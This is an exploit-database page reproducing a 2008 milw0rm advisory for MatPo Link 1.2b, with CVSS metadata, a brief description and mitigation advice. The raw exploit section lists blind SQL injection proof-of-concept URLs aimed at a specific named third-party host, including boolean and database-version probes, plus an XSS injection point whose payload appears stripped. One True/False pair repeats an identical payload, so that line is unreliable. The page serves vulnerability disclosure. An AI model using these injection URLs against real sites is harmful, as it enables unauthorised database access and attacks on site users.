header-logo
Suggest Exploit
vendor:
Link 1.2b
by:
Hakxer
7.5
CVSS
HIGH
Blind Sql Inj / XSS
89, 79
CWE
Product Name: Link 1.2b
Affected Version From: 1.2b
Affected Version To: 1.2b
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

MatPo Link 1.2b Blind Sql Inj / XSS

The MatPo Link 1.2b script is vulnerable to Blind SQL Injection and Cross Site Scripting. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. This can allow an attacker to gain access to sensitive information from the database or execute malicious scripts in the user's browser.

Mitigation:

Input validation should be used to prevent malicious user input from being passed to the database. Additionally, output should be encoded to prevent malicious scripts from being executed in the user's browser.
Source

Exploit-DB raw data:

###########################################################################
      ______    __  __   ______          __                ______                   
     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
        /____/       EgY Coders Vulnerability Research TM                                    

# [~] Discovered by : Hakxer
# [~] Type Gap : Blind Sql inj / XSS
# [~] Script :MatPo Link 1.2b
# [~] Greetz : Allah , Egyptian x hacker , Br1ght D@rk 
##########################################################################

|| Blind Sql Inj ||
 POC: http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+[BSQL]
  Exploit :
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 False
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 True 
  
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=5 True
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=4 False
		
|| Cross Site Scripting ||
Poc:
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=[XSS]
Exploit
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=

#  Proud To be a Muslim #
#_=END=_#

# milw0rm.com [2008-11-03]

Navigation

Suggest Exploit

Services By CQR